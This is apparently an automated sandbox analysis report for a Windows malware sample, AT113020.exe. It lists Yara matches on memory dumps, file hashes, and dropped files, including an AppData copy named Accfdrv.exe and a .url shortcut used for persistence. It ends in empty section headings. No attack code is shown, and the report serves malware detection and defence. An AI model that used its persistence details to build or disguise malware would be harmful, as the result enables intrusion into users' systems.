Source: Yara match	File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE

ID:	326334
Product:	CloudBasic
Start time:	10:01:59
Start date:	03.12.2020
Sample:	AT113020.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	8477c9b80b4b7796f904ec72abe8ff71
SHA1:	edf1c7daed8b5922f727170d9bd51bb00fae2538
SHA256:	772dec92f8ad84f499fbaf384a618c5208e1d5882d753f99aeb396059ffb4f1c
Filetype:	Win32 Executable (generic) a (10002005/4) 99.81%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8477C9B80B4B7796F904EC72ABE8FF71	EDF1C7DAED8B5922F727170D9BD51BB00FAE2538	772DEC92F8AD84F499FBAF384A618C5208E1D5882D753F99AEB396059FFB4F1C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\Accfcxz[1]	ASCII text, with very long lines, with no line terminators	739D33BE50F70F51A099001C64AFF261	BEC90E065E556B86DE081E6F2CB4BA09DFBB6402	97A8E5DF35B9C51DA0AB986A7898590C0BDB8CC8619B04272D5BC9AD04533780
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Accfcxz[1]	ASCII text, with very long lines, with no line terminators	739D33BE50F70F51A099001C64AFF261	BEC90E065E556B86DE081E6F2CB4BA09DFBB6402	97A8E5DF35B9C51DA0AB986A7898590C0BDB8CC8619B04272D5BC9AD04533780
C:\Users\user\AppData\Local\Temp\DB1	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\fccA.url	MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Accfdrv.exe>), ASCII text, with CRLF line terminators	71A8BF7EFEC27A28D07F2BD1C28937C1	1664A23F23C7A20E167CE677D28EED10A4535862	8139AC4B532B1A7287EBD177199466455FAE0DE5E75AC81106ADD1008AA35CA4

Analysis Report AT113020.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs